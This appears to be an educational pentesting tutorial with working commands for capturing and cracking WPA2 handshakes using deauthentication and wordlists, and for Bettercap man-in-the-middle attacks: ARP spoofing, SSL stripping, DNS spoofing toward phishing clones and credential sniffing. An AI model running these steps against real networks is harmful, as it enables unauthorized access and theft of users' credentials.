WPA2 Wi-Fi Password Cracking
WPA2 Wi-Fi password cracking is the process of exploiting vulnerabilities in wireless networks to gain unauthorized access by targeting weak security configurations or poorly chosen passwords. This guide will cover the various techniques and tools used in Wi-Fi security assessments, focusing on capturing WPA2 handshakes, which are crucial for decrypting network passwords. Tools like Aircrack-ng and Hashcat are often used to capture and crack these handshakes, allowing penetration testers to test the strength of WPA2 encryption.
We will also explore common attack vectors, such as dictionary attacks, brute-force methods, and the use of deauthentication attacks to force reconnections and capture handshakes more efficiently. Understanding these techniques is essential for evaluating and strengthening the security of wireless networks, ensuring that they are properly protected against unauthorized access and attacks.
However, with the introduction of WPA3, many of these attacks become less effective due to stronger encryption and a feature called Simultaneous Authentication of Equals (SAE), which replaces the traditional pre-shared key (PSK) method. WPA3 also introduces protections against offline dictionary attacks, making it significantly harder to crack passwords using traditional methods. As a result, penetration testers must adopt different techniques when assessing networks secured by WPA3, as the common methods used for WPA2 cracking may not work on these newer networks.
Video Credit: David Bombal - Educational video on WPA2 and Wi-Fi Security.
Identifying Your Wireless Adapter
First, we need to identify our wireless adapter to ensure it is compatible with monitor mode, which is essential for packet capture. Use the command below to see available network interfaces:
iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0 IEEE 802.11 Mode:Managed Frequency:2.457 GHz Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:on
The output above shows that wlan0 is in Managed mode, which means it is connected to an access point. To conduct WiFi cracking, we need to switch it to monitor mode.
Enabling Monitor Mode
Before enabling monitor mode, it is important to kill any processes that could interfere with the operation of the wireless interface:
sudo airmon-ng check kill
Now, enable monitor mode on wlan0 using:
sudo airmon-ng start wlan0
Verify that the mode has changed to Monitor by running the following command again:
iwconfig wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:on
The interface name might have changed to wlan0mon, indicating that it is now in Monitor mode and ready for packet capture.
Scanning for Available Networks
Next, we will scan for available wireless networks. Use airodump-ng
to gather information about nearby networks:
sudo airodump-ng wlan0mon CH 13 ][ Elapsed: 0 s ][ 2024-10-12 20:44 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:00:00:00:00:00 -41 1 11 0 7 1300 WPA2 CCMP PSK ExampleWiFi
Identify the target network by noting its BSSID (MAC Address) and the Channel (CH) it is using. This information is crucial for the next steps.
Capturing Handshake Data
We will now capture packets to obtain the WPA2 handshake, which occurs when a device connects to the target network. Use the following command, replacing the placeholders with your captured details:
sudo airodump-ng -w capturefile -c 7 --bssid 00:00:00:00:00:00 wlan0mon
The above command will write captured packets to a file named capturefile
. Once a client connects, a WPA handshake should be captured.
Forcing a Client to Reconnect
In some cases, you may need to force a device to disconnect so that it will reconnect, thereby allowing you to capture the handshake. This can be done by sending deauthentication packets:
sudo aireplay-ng --deauth 0 -a 00:00:00:00:00:00 wlan0mon
Wait for the handshake to be captured, which will appear in the terminal as [WPA Handshake: 00:00:00:00:00:00]
.
Cracking the Password
After capturing the handshake, the next step is to attempt to crack the WPA2 passphrase using a dictionary attack. Use aircrack-ng
along with a wordlist like rockyou.txt
:
aircrack-ng capturefile-01.cap -w /usr/share/wordlists/rockyou.txt
If the wordlist is compressed, unzip it first:
gunzip /usr/share/wordlists/rockyou.txt.gz
Aircrack-ng will then attempt to crack the passphrase by trying every password in the wordlist.
Video Credit: NetworkChuck- Wi-Fi Hacking
Introduction to Bettercap
Bettercap is a powerful and modular tool designed for network reconnaissance, penetration testing, and Man-in-the-Middle (MITM) attacks. With a wide range of capabilities, it allows attackers to intercept, modify, or even manipulate data being transmitted on a network. Bettercap works on many protocols, including HTTP, HTTPS, TCP, UDP, and more, and is highly effective for wireless network attacks. This guide will help you understand how to perform a MITM attack using Bettercap.
Installing Bettercap
To begin, you need to install Bettercap. This can be done through a package manager like apt
on Debian-based systems, or by installing it manually via the Go language.
sudo apt-get update sudo apt-get install bettercap
Alternatively, you can install Bettercap using Go:
go install github.com/bettercap/bettercap@latest
Setting Up Bettercap for MITM Attacks
Before initiating a MITM attack, ensure you have the correct network adapter in monitor mode. Use ifconfig
or ip a
to identify your network interfaces and then enable monitoring using airmon-ng
or ip link
.
sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up
Launching Bettercap
To start Bettercap, simply use the following command:
sudo bettercap -iface wlan0
Replace wlan0
with your network interface name.
Performing ARP Spoofing with Bettercap
ARP spoofing is a technique that allows an attacker to position themselves between two communicating devices, intercepting their data in a MITM attack. Bettercap makes ARP spoofing straightforward. First, you need to identify the targets on the network:
net.probe on
This command will discover all active devices on the network. Once you have the IP addresses of your target, you can start ARP spoofing:
set arp.spoof.targets [target-ip] arp.spoof on
Replace [target-ip]
with the actual IP address of the device you want to target. You can also target multiple devices by separating the IPs with commas.
HTTP/HTTPS Traffic Interception
To intercept HTTP traffic, Bettercap has a built-in module called http.proxy
. To enable it, use:
http.proxy on
Bettercap can also strip HTTPS and downgrade it to HTTP, making it easier to view transmitted data. Enable https.proxy
:
https.proxy on
Keep in mind that HTTPS stripping will only work if clients ignore warnings about untrusted certificates, so this may not be effective on all targets.
DNS Spoofing
Another powerful feature of Bettercap is DNS spoofing, which allows you to redirect DNS requests to a fake IP address, such as a cloned website for phishing:
set dns.spoof.all true dns.spoof on
With DNS spoofing enabled, all DNS requests on the network will be redirected to a specified IP address.
Sniffing Network Data
Bettercap includes a powerful sniffer module for capturing packets from the network:
net.sniff on
Bettercap will start capturing packets and displaying relevant information on the console. You can use various filters to capture only specific data, such as credentials or sensitive information.
SSL Stripping
SSL stripping is a method used to downgrade HTTPS to HTTP, allowing you to capture sensitive information transmitted over secure connections. To enable SSL stripping, use:
https.proxy on set https.proxy.sslstrip true
This will force connections to use HTTP instead of HTTPS, making data easier to capture and analyze.
Disconnecting a Client
If you want to disconnect a specific client from the network to force reconnection (for instance, to capture data), you can use deauthentication attacks with Bettercap:
wifi.deauth [target-mac]
Replace [target-mac]
with the MAC address of the device you want to disconnect. This will send deauthentication packets, disconnecting the target from the network momentarily.
Viewing Captured Traffic with Wireshark
Wireshark is a powerful tool that can be used to analyze the traffic captured during a MITM attack. After starting Bettercap’s sniffer, you can save the captured packets to a file and then analyze them using Wireshark.
First, make sure you have Wireshark installed:
sudo apt-get install wireshark
To save the captured packets in Bettercap, use the following command:
net.sniff.output /path/to/save/capture.pcap
Replace /path/to/save/capture.pcap
with the desired file path where you want to save the packet capture.
Once you have saved the packets, open Wireshark and load the capture file:
wireshark /path/to/save/capture.pcap
Wireshark will provide a detailed view of the captured packets, allowing you to analyze various network protocols and identify sensitive information. Here are some tips for analyzing the traffic:
- Filter Traffic: Use Wireshark’s filter bar to narrow down the packets of interest. For example, to view only HTTP packets, use the filter
http
. For ARP packets, usearp
. - Follow TCP Stream: If you want to view the entire conversation between a client and a server, right-click on a packet and select
Follow
>TCP Stream
. This will provide a complete view of the data exchanged in that session. - Inspect Credentials: Look for HTTP POST requests that may contain login credentials in the form of plaintext. Use filters like
http.request.method == "POST"
to find such requests. - Analyze DNS Spoofing: If you performed DNS spoofing, you can filter for DNS packets using
dns
and observe which requests were redirected.
MITM Attacks Becoming Outdated
MITM attacks have become increasingly outdated due to the widespread adoption of HTTPS, which encrypts data between clients and servers. Unlike HTTP, which transmits information in plaintext, HTTPS ensures that sensitive data such as login credentials and personal information are securely transmitted, making it challenging for attackers to capture meaningful information without decrypting the traffic. Without access to the decryption key, intercepted data remains unreadable, significantly reducing the effectiveness of MITM attacks in modern networks. As a result, MITM attacks are mostly limited to situations where attackers can bypass or compromise encryption.